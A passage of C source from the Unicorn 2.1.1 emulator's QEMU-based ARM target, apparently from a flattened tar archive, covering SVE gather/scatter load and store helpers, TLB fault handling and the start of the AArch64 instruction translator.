zsu) DO_LD1_ZPZ_D(hds_le, zss) DO_LD1_ZPZ_D(hds_le, zd) DO_LD1_ZPZ_S(hss_be, zsu) DO_LD1_ZPZ_S(hss_be, zss) DO_LD1_ZPZ_D(hds_be, zsu) DO_LD1_ZPZ_D(hds_be, zss) DO_LD1_ZPZ_D(hds_be, zd) DO_LD1_ZPZ_S(ss_le, zsu) DO_LD1_ZPZ_S(ss_le, zss) DO_LD1_ZPZ_D(sdu_le, zsu) DO_LD1_ZPZ_D(sdu_le, zss) DO_LD1_ZPZ_D(sdu_le, zd) DO_LD1_ZPZ_S(ss_be, zsu) DO_LD1_ZPZ_S(ss_be, zss) DO_LD1_ZPZ_D(sdu_be, zsu) DO_LD1_ZPZ_D(sdu_be, zss) DO_LD1_ZPZ_D(sdu_be, zd) DO_LD1_ZPZ_D(sds_le, zsu) DO_LD1_ZPZ_D(sds_le, zss) DO_LD1_ZPZ_D(sds_le, zd) DO_LD1_ZPZ_D(sds_be, zsu) DO_LD1_ZPZ_D(sds_be, zss) DO_LD1_ZPZ_D(sds_be, zd) DO_LD1_ZPZ_D(dd_le, zsu) DO_LD1_ZPZ_D(dd_le, zss) DO_LD1_ZPZ_D(dd_le, zd) DO_LD1_ZPZ_D(dd_be, zsu) DO_LD1_ZPZ_D(dd_be, zss) DO_LD1_ZPZ_D(dd_be, zd) #undef DO_LD1_ZPZ_S #undef DO_LD1_ZPZ_D /* First fault loads with a vector index. */ /* Load one element into VD+REG_OFF from (ENV,VADDR) without faulting. * The controlling predicate is known to be true. Return true if the * load was successful. */ typedef bool sve_ld1_nf_fn(CPUARMState *env, void *vd, intptr_t reg_off, target_ulong vaddr, int mmu_idx); #ifdef _MSC_VER #define DO_LD_NF(NAME, H, TYPEE, TYPEM, HOST) \ static bool sve_ld##NAME##_nf(CPUARMState *env, void *vd, intptr_t reg_off, \ target_ulong addr, int mmu_idx) \ { \ struct uc_struct *uc = env->uc; \ target_ulong next_page = 0ULL - (addr | TARGET_PAGE_MASK); \ if (likely(next_page - addr >= sizeof(TYPEM))) { \ void *host = tlb_vaddr_to_host(env, addr, MMU_DATA_LOAD, mmu_idx); \ if (likely(host)) { \ TYPEM val = HOST(host); \ *(TYPEE *)((char *)vd + H(reg_off)) = val; \ return true; \ } \ } \ return false; \ } #else #define DO_LD_NF(NAME, H, TYPEE, TYPEM, HOST) \ static bool sve_ld##NAME##_nf(CPUARMState *env, void *vd, intptr_t reg_off, \ target_ulong addr, int mmu_idx) \ { \ struct uc_struct *uc = env->uc; \ target_ulong next_page = -(addr | TARGET_PAGE_MASK); \ if (likely(next_page - addr >= sizeof(TYPEM))) { \ void *host = tlb_vaddr_to_host(env, addr, MMU_DATA_LOAD, mmu_idx); \ if (likely(host)) { \ TYPEM val = HOST(host); \ *(TYPEE *)((char *)vd + H(reg_off)) = val; \ return true; \ } \ } \ return false; \ } #endif DO_LD_NF(bsu, H1_4, uint32_t, uint8_t, ldub_p) DO_LD_NF(bss, H1_4, uint32_t, int8_t, ldsb_p) DO_LD_NF(bdu, , uint64_t, uint8_t, ldub_p) DO_LD_NF(bds, , uint64_t, int8_t, ldsb_p) DO_LD_NF(hsu_le, H1_4, uint32_t, uint16_t, lduw_le_p) DO_LD_NF(hss_le, H1_4, uint32_t, int16_t, ldsw_le_p) DO_LD_NF(hsu_be, H1_4, uint32_t, uint16_t, lduw_be_p) DO_LD_NF(hss_be, H1_4, uint32_t, int16_t, ldsw_be_p) DO_LD_NF(hdu_le, , uint64_t, uint16_t, lduw_le_p) DO_LD_NF(hds_le, , uint64_t, int16_t, ldsw_le_p) DO_LD_NF(hdu_be, , uint64_t, uint16_t, lduw_be_p) DO_LD_NF(hds_be, , uint64_t, int16_t, ldsw_be_p) DO_LD_NF(ss_le, H1_4, uint32_t, uint32_t, ldl_le_p) DO_LD_NF(ss_be, H1_4, uint32_t, uint32_t, ldl_be_p) DO_LD_NF(sdu_le, , uint64_t, uint32_t, ldl_le_p) DO_LD_NF(sds_le, , uint64_t, int32_t, ldl_le_p) DO_LD_NF(sdu_be, , uint64_t, uint32_t, ldl_be_p) DO_LD_NF(sds_be, , uint64_t, int32_t, ldl_be_p) DO_LD_NF(dd_le, , uint64_t, uint64_t, ldq_le_p) DO_LD_NF(dd_be, , uint64_t, uint64_t, ldq_be_p) /* * Common helper for all gather first-faulting loads. */ static inline void sve_ldff1_zs(CPUARMState *env, void *vd, void *vg, void *vm, target_ulong base, uint32_t desc, uintptr_t ra, zreg_off_fn *off_fn, sve_ld1_tlb_fn *tlb_fn, sve_ld1_nf_fn *nonfault_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int mmu_idx = get_mmuidx(oi); const int scale = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 2); intptr_t reg_off, reg_max = simd_oprsz(desc); target_ulong addr; /* Skip to the first true predicate. */ reg_off = find_next_active(vg, 0, reg_max, MO_32); if (likely(reg_off < reg_max)) { /* Perform one normal read, which will fault or not. */ set_helper_retaddr(ra); addr = off_fn(vm, reg_off); addr = base + (addr << scale); tlb_fn(env, vd, reg_off, addr, oi, ra); /* The rest of the reads will be non-faulting. */ clear_helper_retaddr(); } /* After any fault, zero the leading predicated false elements. */ swap_memzero(vd, reg_off); while (likely((reg_off += 4) < reg_max)) { uint64_t pg = *(uint64_t *)((char *)vg + (reg_off >> 6) * 8); if (likely((pg >> (reg_off & 63)) & 1)) { addr = off_fn(vm, reg_off); addr = base + (addr << scale); if (!nonfault_fn(env, vd, reg_off, addr, mmu_idx)) { record_fault(env, reg_off, reg_max); break; } } else { *(uint32_t *)((char *)vd + H1_4(reg_off)) = 0; } } } static inline void sve_ldff1_zd(CPUARMState *env, void *vd, void *vg, void *vm, target_ulong base, uint32_t desc, uintptr_t ra, zreg_off_fn *off_fn, sve_ld1_tlb_fn *tlb_fn, sve_ld1_nf_fn *nonfault_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int mmu_idx = get_mmuidx(oi); const int scale = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 2); intptr_t reg_off, reg_max = simd_oprsz(desc); target_ulong addr; /* Skip to the first true predicate. */ reg_off = find_next_active(vg, 0, reg_max, MO_64); if (likely(reg_off < reg_max)) { /* Perform one normal read, which will fault or not. */ set_helper_retaddr(ra); addr = off_fn(vm, reg_off); addr = base + (addr << scale); tlb_fn(env, vd, reg_off, addr, oi, ra); /* The rest of the reads will be non-faulting. */ clear_helper_retaddr(); } /* After any fault, zero the leading predicated false elements. */ swap_memzero(vd, reg_off); while (likely((reg_off += 8) < reg_max)) { uint8_t pg = *(uint8_t *)((char *)vg + H1(reg_off >> 3)); if (likely(pg & 1)) { addr = off_fn(vm, reg_off); addr = base + (addr << scale); if (!nonfault_fn(env, vd, reg_off, addr, mmu_idx)) { record_fault(env, reg_off, reg_max); break; } } else { *(uint64_t *)((char *)vd + reg_off) = 0; } } } #define DO_LDFF1_ZPZ_S(MEM, OFS) \ void HELPER(sve_ldff##MEM##_##OFS) \ (CPUARMState *env, void *vd, void *vg, void *vm, \ target_ulong base, uint32_t desc) \ { \ sve_ldff1_zs(env, vd, vg, vm, base, desc, GETPC(), \ off_##OFS##_s, sve_ld1##MEM##_tlb, sve_ld##MEM##_nf); \ } #define DO_LDFF1_ZPZ_D(MEM, OFS) \ void HELPER(sve_ldff##MEM##_##OFS) \ (CPUARMState *env, void *vd, void *vg, void *vm, \ target_ulong base, uint32_t desc) \ { \ sve_ldff1_zd(env, vd, vg, vm, base, desc, GETPC(), \ off_##OFS##_d, sve_ld1##MEM##_tlb, sve_ld##MEM##_nf); \ } DO_LDFF1_ZPZ_S(bsu, zsu) DO_LDFF1_ZPZ_S(bsu, zss) DO_LDFF1_ZPZ_D(bdu, zsu) DO_LDFF1_ZPZ_D(bdu, zss) DO_LDFF1_ZPZ_D(bdu, zd) DO_LDFF1_ZPZ_S(bss, zsu) DO_LDFF1_ZPZ_S(bss, zss) DO_LDFF1_ZPZ_D(bds, zsu) DO_LDFF1_ZPZ_D(bds, zss) DO_LDFF1_ZPZ_D(bds, zd) DO_LDFF1_ZPZ_S(hsu_le, zsu) DO_LDFF1_ZPZ_S(hsu_le, zss) DO_LDFF1_ZPZ_D(hdu_le, zsu) DO_LDFF1_ZPZ_D(hdu_le, zss) DO_LDFF1_ZPZ_D(hdu_le, zd) DO_LDFF1_ZPZ_S(hsu_be, zsu) DO_LDFF1_ZPZ_S(hsu_be, zss) DO_LDFF1_ZPZ_D(hdu_be, zsu) DO_LDFF1_ZPZ_D(hdu_be, zss) DO_LDFF1_ZPZ_D(hdu_be, zd) DO_LDFF1_ZPZ_S(hss_le, zsu) DO_LDFF1_ZPZ_S(hss_le, zss) DO_LDFF1_ZPZ_D(hds_le, zsu) DO_LDFF1_ZPZ_D(hds_le, zss) DO_LDFF1_ZPZ_D(hds_le, zd) DO_LDFF1_ZPZ_S(hss_be, zsu) DO_LDFF1_ZPZ_S(hss_be, zss) DO_LDFF1_ZPZ_D(hds_be, zsu) DO_LDFF1_ZPZ_D(hds_be, zss) DO_LDFF1_ZPZ_D(hds_be, zd) DO_LDFF1_ZPZ_S(ss_le, zsu) DO_LDFF1_ZPZ_S(ss_le, zss) DO_LDFF1_ZPZ_D(sdu_le, zsu) DO_LDFF1_ZPZ_D(sdu_le, zss) DO_LDFF1_ZPZ_D(sdu_le, zd) DO_LDFF1_ZPZ_S(ss_be, zsu) DO_LDFF1_ZPZ_S(ss_be, zss) DO_LDFF1_ZPZ_D(sdu_be, zsu) DO_LDFF1_ZPZ_D(sdu_be, zss) DO_LDFF1_ZPZ_D(sdu_be, zd) DO_LDFF1_ZPZ_D(sds_le, zsu) DO_LDFF1_ZPZ_D(sds_le, zss) DO_LDFF1_ZPZ_D(sds_le, zd) DO_LDFF1_ZPZ_D(sds_be, zsu) DO_LDFF1_ZPZ_D(sds_be, zss) DO_LDFF1_ZPZ_D(sds_be, zd) DO_LDFF1_ZPZ_D(dd_le, zsu) DO_LDFF1_ZPZ_D(dd_le, zss) DO_LDFF1_ZPZ_D(dd_le, zd) DO_LDFF1_ZPZ_D(dd_be, zsu) DO_LDFF1_ZPZ_D(dd_be, zss) DO_LDFF1_ZPZ_D(dd_be, zd) /* Stores with a vector index. */ static void sve_st1_zs(CPUARMState *env, void *vd, void *vg, void *vm, target_ulong base, uint32_t desc, uintptr_t ra, zreg_off_fn *off_fn, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int scale = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 2); intptr_t i, oprsz = simd_oprsz(desc); set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (likely(pg & 1)) { target_ulong off = off_fn(vm, i); tlb_fn(env, vd, i, base + (off << scale), oi, ra); } i += 4, pg >>= 4; } while (i & 15); } clear_helper_retaddr(); } static void sve_st1_zd(CPUARMState *env, void *vd, void *vg, void *vm, target_ulong base, uint32_t desc, uintptr_t ra, zreg_off_fn *off_fn, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int scale = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 2); intptr_t i, oprsz = simd_oprsz(desc) / 8; set_helper_retaddr(ra); for (i = 0; i < oprsz; i++) { uint8_t pg = *(uint8_t *)((char *)vg + H1(i)); if (likely(pg & 1)) { target_ulong off = off_fn(vm, i * 8); tlb_fn(env, vd, i * 8, base + (off << scale), oi, ra); } } clear_helper_retaddr(); } #define DO_ST1_ZPZ_S(MEM, OFS) \ void QEMU_FLATTEN HELPER(sve_st##MEM##_##OFS) \ (CPUARMState *env, void *vd, void *vg, void *vm, \ target_ulong base, uint32_t desc) \ { \ sve_st1_zs(env, vd, vg, vm, base, desc, GETPC(), \ off_##OFS##_s, sve_st1##MEM##_tlb); \ } #define DO_ST1_ZPZ_D(MEM, OFS) \ void QEMU_FLATTEN HELPER(sve_st##MEM##_##OFS) \ (CPUARMState *env, void *vd, void *vg, void *vm, \ target_ulong base, uint32_t desc) \ { \ sve_st1_zd(env, vd, vg, vm, base, desc, GETPC(), \ off_##OFS##_d, sve_st1##MEM##_tlb); \ } DO_ST1_ZPZ_S(bs, zsu) DO_ST1_ZPZ_S(hs_le, zsu) DO_ST1_ZPZ_S(hs_be, zsu) DO_ST1_ZPZ_S(ss_le, zsu) DO_ST1_ZPZ_S(ss_be, zsu) DO_ST1_ZPZ_S(bs, zss) DO_ST1_ZPZ_S(hs_le, zss) DO_ST1_ZPZ_S(hs_be, zss) DO_ST1_ZPZ_S(ss_le, zss) DO_ST1_ZPZ_S(ss_be, zss) DO_ST1_ZPZ_D(bd, zsu) DO_ST1_ZPZ_D(hd_le, zsu) DO_ST1_ZPZ_D(hd_be, zsu) DO_ST1_ZPZ_D(sd_le, zsu) DO_ST1_ZPZ_D(sd_be, zsu) DO_ST1_ZPZ_D(dd_le, zsu) DO_ST1_ZPZ_D(dd_be, zsu) DO_ST1_ZPZ_D(bd, zss) DO_ST1_ZPZ_D(hd_le, zss) DO_ST1_ZPZ_D(hd_be, zss) DO_ST1_ZPZ_D(sd_le, zss) DO_ST1_ZPZ_D(sd_be, zss) DO_ST1_ZPZ_D(dd_le, zss) DO_ST1_ZPZ_D(dd_be, zss) DO_ST1_ZPZ_D(bd, zd) DO_ST1_ZPZ_D(hd_le, zd) DO_ST1_ZPZ_D(hd_be, zd) DO_ST1_ZPZ_D(sd_le, zd) DO_ST1_ZPZ_D(sd_be, zd) DO_ST1_ZPZ_D(dd_le, zd) DO_ST1_ZPZ_D(dd_be, zd) #undef DO_ST1_ZPZ_S #undef DO_ST1_ZPZ_D ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/tlb_helper.c����������������������������������������������������������0000664�0000000�0000000�00000014721�14675241067�0020511�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM TLB (Translation lookaside buffer) helpers. * * This code is licensed under the GNU GPL v2 or later. * * SPDX-License-Identifier: GPL-2.0-or-later */ #include "qemu/osdep.h" #include "cpu.h" #include "internals.h" #include "exec/exec-all.h" static inline uint32_t merge_syn_data_abort(uint32_t template_syn, unsigned int target_el, bool same_el, bool ea, bool s1ptw, bool is_write, int fsc) { uint32_t syn; /* * ISV is only set for data aborts routed to EL2 and * never for stage-1 page table walks faulting on stage 2. * * Furthermore, ISV is only set for certain kinds of load/stores. * If the template syndrome does not have ISV set, we should leave * it cleared. * * See ARMv8 specs, D7-1974: * ISS encoding for an exception from a Data Abort, the * ISV field. */ if (!(template_syn & ARM_EL_ISV) || target_el != 2 || s1ptw) { syn = syn_data_abort_no_iss(same_el, ea, 0, s1ptw, is_write, fsc); } else { /* * Fields: IL, ISV, SAS, SSE, SRT, SF and AR come from the template * syndrome created at translation time. * Now we create the runtime syndrome with the remaining fields. */ syn = syn_data_abort_with_iss(same_el, 0, 0, 0, 0, 0, ea, 0, s1ptw, is_write, fsc, true); /* Merge the runtime syndrome with the template syndrome. */ syn |= template_syn; } return syn; } static void QEMU_NORETURN arm_deliver_fault(ARMCPU *cpu, vaddr addr, MMUAccessType access_type, int mmu_idx, ARMMMUFaultInfo *fi) { CPUARMState *env = &cpu->env; int target_el; bool same_el; uint32_t syn, exc, fsr, fsc; ARMMMUIdx arm_mmu_idx = core_to_arm_mmu_idx(env, mmu_idx); target_el = exception_target_el(env); if (fi->stage2) { target_el = 2; env->cp15.hpfar_el2 = extract64(fi->s2addr, 12, 47) << 4; } same_el = (arm_current_el(env) == target_el); if (target_el == 2 || arm_el_is_aa64(env, target_el) || arm_s1_regime_using_lpae_format(env, arm_mmu_idx)) { /* * LPAE format fault status register : bottom 6 bits are * status code in the same form as needed for syndrome */ fsr = arm_fi_to_lfsc(fi); fsc = extract32(fsr, 0, 6); } else { fsr = arm_fi_to_sfsc(fi); /* * Short format FSR : this fault will never actually be reported * to an EL that uses a syndrome register. Use a (currently) * reserved FSR code in case the constructed syndrome does leak * into the guest somehow. */ fsc = 0x3f; } if (access_type == MMU_INST_FETCH) { syn = syn_insn_abort(same_el, fi->ea, fi->s1ptw, fsc); exc = EXCP_PREFETCH_ABORT; } else { syn = merge_syn_data_abort(env->exception.syndrome, target_el, same_el, fi->ea, fi->s1ptw, access_type == MMU_DATA_STORE, fsc); if (access_type == MMU_DATA_STORE && arm_feature(env, ARM_FEATURE_V6)) { fsr |= (1 << 11); } exc = EXCP_DATA_ABORT; } env->exception.vaddress = addr; env->exception.fsr = fsr; raise_exception(env, exc, syn, target_el); } /* Raise a data fault alignment exception for the specified virtual address */ void arm_cpu_do_unaligned_access(CPUState *cs, vaddr vaddr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { ARMCPU *cpu = ARM_CPU(cs); ARMMMUFaultInfo fi = { 0 }; /* now we have a real cpu fault */ cpu_restore_state(cs, retaddr, true); fi.type = ARMFault_Alignment; arm_deliver_fault(cpu, vaddr, access_type, mmu_idx, &fi); } /* * arm_cpu_do_transaction_failed: handle a memory system error response * (eg "no device/memory present at address") by raising an external abort * exception */ void arm_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr) { ARMCPU *cpu = ARM_CPU(cs); ARMMMUFaultInfo fi = { 0 }; /* now we have a real cpu fault */ cpu_restore_state(cs, retaddr, true); fi.ea = arm_extabort_type(response); fi.type = ARMFault_SyncExternal; arm_deliver_fault(cpu, addr, access_type, mmu_idx, &fi); } bool arm_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { struct uc_struct *uc = cs->uc; ARMCPU *cpu = ARM_CPU(cs); hwaddr phys_addr; target_ulong page_size; int prot, ret; MemTxAttrs attrs = { 0 }; ARMMMUFaultInfo fi = { 0 }; /* * Walk the page table and (if the mapping exists) add the page * to the TLB. On success, return true. Otherwise, if probing, * return false. Otherwise populate fsr with ARM DFSR/IFSR fault * register format, and signal the fault. */ ret = get_phys_addr(&cpu->env, address, access_type, core_to_arm_mmu_idx(&cpu->env, mmu_idx), &phys_addr, &attrs, &prot, &page_size, &fi, NULL); if (likely(!ret)) { /* * Map a single [sub]page. Regions smaller than our declared * target page size are handled specially, so for those we * pass in the exact addresses. */ if (page_size >= TARGET_PAGE_SIZE) { phys_addr &= TARGET_PAGE_MASK; address &= TARGET_PAGE_MASK; } tlb_set_page_with_attrs(cs, address, phys_addr, attrs, prot, mmu_idx, page_size); return true; } else if (probe) { return false; } else { /* now we have a real cpu fault */ cpu_restore_state(cs, retaddr, true); arm_deliver_fault(cpu, address, access_type, mmu_idx, &fi); } } �����������������������������������������������unicorn-2.1.1/qemu/target/arm/translate-a64.c�������������������������������������������������������0000664�0000000�0000000�00001701446�14675241067�0020766�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * AArch64 translation * * Copyright (c) 2013 Alexander Graf <agraf@suse.de> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "tcg/tcg-op-gvec.h" #include "qemu/log.h" #include "arm_ldst.h" #include "translate.h" #include "internals.h" #include "qemu/host-utils.h" #include "exec/gen-icount.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "translate-a64.h" #include "qemu/atomic128.h" #include "kvm-consts.h" static const char *regnames[] = { "x0", "x1", "x2", "x3", "x4", "x5", "x6", "x7", "x8", "x9", "x10", "x11", "x12", "x13", "x14", "x15", "x16", "x17", "x18", "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26", "x27", "x28", "x29", "lr", "sp" }; enum a64_shift_type { A64_SHIFT_TYPE_LSL = 0, A64_SHIFT_TYPE_LSR = 1, A64_SHIFT_TYPE_ASR = 2, A64_SHIFT_TYPE_ROR = 3 }; /* Table based decoder typedefs - used when the relevant bits for decode * are too awkwardly scattered across the instruction (eg SIMD). */ typedef void AArch64DecodeFn(DisasContext *s, uint32_t insn); typedef struct AArch64DecodeTable { uint32_t pattern; uint32_t mask; AArch64DecodeFn *disas_fn; } AArch64DecodeTable; /* Function prototype for gen_ functions for calling Neon helpers */ typedef void NeonGenOneOpEnvFn(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_i32); typedef void NeonGenTwoOpFn(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32); typedef void NeonGenTwoOpEnvFn(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_i32, TCGv_i32); typedef void NeonGenTwo64OpFn(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64); typedef void NeonGenTwo64OpEnvFn(TCGContext *, TCGv_i64, TCGv_ptr, TCGv_i64, TCGv_i64); typedef void NeonGenNarrowFn(TCGContext *, TCGv_i32, TCGv_i64); typedef void NeonGenNarrowEnvFn(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_i64); typedef void NeonGenWidenFn(TCGContext *, TCGv_i64, TCGv_i32); typedef void NeonGenTwoSingleOPFn(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_ptr); typedef void NeonGenTwoDoubleOPFn(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_ptr); typedef void NeonGenOneOpFn(TCGContext *, TCGv_i64, TCGv_i64); typedef void CryptoTwoOpFn(TCGContext *, TCGv_ptr, TCGv_ptr); typedef void CryptoThreeOpIntFn(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_i32); typedef void CryptoThreeOpFn(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr); typedef void AtomicThreeOpFn(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64, TCGArg, MemOp); /* initialize TCG globals. */ void a64_translate_init(struct uc_struct *uc) { int i; TCGContext *tcg_ctx = uc->tcg_ctx; tcg_ctx->cpu_pc_arm64 = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, pc), "pc"); for (i = 0; i < 32; i++) { tcg_ctx->cpu_X[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, xregs[i]), regnames[i]); } tcg_ctx->cpu_exclusive_high = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, exclusive_high), "exclusive_high"); } /* * Return the core mmu_idx to use for A64 "unprivileged load/store" insns */ static int get_a64_user_mem_index(DisasContext *s) { /* * If AccType_UNPRIV is not used, the insn uses AccType_NORMAL, * which is the usual mmu_idx for this cpu state. */ ARMMMUIdx useridx = s->mmu_idx; if (s->unpriv) { /* * We have pre-computed the condition for AccType_UNPRIV. * Therefore we should never get here with a mmu_idx for * which we do not know the corresponding user mmu_idx. */ switch (useridx) { case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: useridx = ARMMMUIdx_E10_0; break; case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: useridx = ARMMMUIdx_E20_0; break; case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: useridx = ARMMMUIdx_SE10_0; break; default: g_assert_not_reached(); } } return arm_to_core_mmu_idx(useridx); } static void reset_btype(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->btype != 0) { TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_st_i32(tcg_ctx, zero, tcg_ctx->cpu_env, offsetof(CPUARMState, btype)); tcg_temp_free_i32(tcg_ctx, zero); s->btype = 0; } } static void set_btype(DisasContext *s, int val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_val; /* BTYPE is a 2-bit field, and 0 should be done with reset_btype. */ tcg_debug_assert(val >= 1 && val <= 3); tcg_val = tcg_const_i32(tcg_ctx, val); tcg_gen_st_i32(tcg_ctx, tcg_val, tcg_ctx->cpu_env, offsetof(CPUARMState, btype)); tcg_temp_free_i32(tcg_ctx, tcg_val); s->btype = -1; } void gen_a64_set_pc_im(TCGContext *tcg_ctx, uint64_t val) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_pc_arm64, val); } /* * Handle Top Byte Ignore (TBI) bits. * * If address tagging is enabled via the TCR TBI bits: * + for EL2 and EL3 there is only one TBI bit, and if it is set * then the address is zero-extended, clearing bits [63:56] * + for EL0 and EL1, TBI0 controls addresses with bit 55 == 0 * and TBI1 controls addressses with bit 55 == 1. * If the appropriate TBI bit is set for the address then * the address is sign-extended from bit 55 into bits [63:56] * * Here We have concatenated TBI{1,0} into tbi. */ static void gen_top_byte_ignore(DisasContext *s, TCGv_i64 dst, TCGv_i64 src, int tbi) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (tbi == 0) { /* Load unmodified address */ tcg_gen_mov_i64(tcg_ctx, dst, src); } else if (!regime_has_2_ranges(s->mmu_idx)) { /* Force tag byte to all zero */ tcg_gen_extract_i64(tcg_ctx, dst, src, 0, 56); } else { /* Sign-extend from bit 55. */ tcg_gen_sextract_i64(tcg_ctx, dst, src, 0, 56); if (tbi != 3) { TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); /* * The two TBI bits differ. * If tbi0, then !tbi1: only use the extension if positive. * if !tbi0, then tbi1: only use the extension if negative. */ tcg_gen_movcond_i64(tcg_ctx, tbi == 1 ? TCG_COND_GE : TCG_COND_LT, dst, dst, tcg_zero, dst, src); tcg_temp_free_i64(tcg_ctx, tcg_zero); } } } static void gen_a64_set_pc(DisasContext *s, TCGv_i64 src) { /* * If address tagging is enabled for instructions via the TCR TBI bits, * then loading an address into the PC will clear out any tag. */ gen_top_byte_ignore(s, s->uc->tcg_ctx->cpu_pc_arm64, src, s->tbii); } /* * Return a "clean" address for ADDR according to TBID. * This is always a fresh temporary, as we need to be able to * increment this independently of a dirty write-back address. */ static TCGv_i64 clean_data_tbi(DisasContext *s, TCGv_i64 addr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 clean = new_tmp_a64(s); /* * In order to get the correct value in the FAR_ELx register, * we must present the memory subsystem with the "dirty" address * including the TBI. In system mode we can make this work via * the TLB, dropping the TBI during translation. But for user-only * mode we don't have that option, and must remove the top byte now. */ tcg_gen_mov_i64(tcg_ctx, clean, addr); return clean; } typedef struct DisasCompare64 { TCGCond cond; TCGv_i64 value; } DisasCompare64; static void a64_test_cc(TCGContext *tcg_ctx, DisasCompare64 *c64, int cc) { DisasCompare c32; arm_test_cc(tcg_ctx, &c32, cc); /* Sign-extend the 32-bit value so that the GE/LT comparisons work * properly. The NE/EQ comparisons are also fine with this choice. */ c64->cond = c32.cond; c64->value = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, c64->value, c32.value); arm_free_cc(tcg_ctx, &c32); } static void a64_free_cc(TCGContext *tcg_ctx, DisasCompare64 *c64) { tcg_temp_free_i64(tcg_ctx, c64->value); } static void gen_exception_internal(TCGContext *tcg_ctx, int excp) { TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); assert(excp_is_internal(excp)); gen_helper_exception_internal(tcg_ctx, tcg_ctx->cpu_env, tcg_excp); tcg_temp_free_i32(tcg_ctx, tcg_excp); } static void gen_exception_internal_insn(DisasContext *s, uint64_t pc, int excp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_a64_set_pc_im(tcg_ctx, pc); gen_exception_internal(tcg_ctx, excp); s->base.is_jmp = DISAS_NORETURN; } static void gen_exception_insn(DisasContext *s, uint64_t pc, int excp, uint32_t syndrome, uint32_t target_el) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_a64_set_pc_im(tcg_ctx, pc); gen_exception(tcg_ctx, excp, syndrome, target_el); s->base.is_jmp = DISAS_NORETURN; } static void gen_exception_bkpt_insn(DisasContext *s, uint32_t syndrome) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_syn; gen_a64_set_pc_im(tcg_ctx, s->pc_curr); tcg_syn = tcg_const_i32(tcg_ctx, syndrome); gen_helper_exception_bkpt_insn(tcg_ctx, tcg_ctx->cpu_env, tcg_syn); tcg_temp_free_i32(tcg_ctx, tcg_syn); s->base.is_jmp = DISAS_NORETURN; } static void gen_step_complete_exception(DisasContext *s) { /* We just completed step of an insn. Move from Active-not-pending * to Active-pending, and then also take the swstep exception. * This corresponds to making the (IMPDEF) choice to prioritize * swstep exceptions over asynchronous exceptions taken to an exception * level where debug is disabled. This choice has the advantage that * we do not need to maintain internal state corresponding to the * ISV/EX syndrome bits between completion of the step and generation * of the exception, and our syndrome information is always correct. */ gen_ss_advance(s); gen_swstep_exception(s, 1, s->is_ldex); s->base.is_jmp = 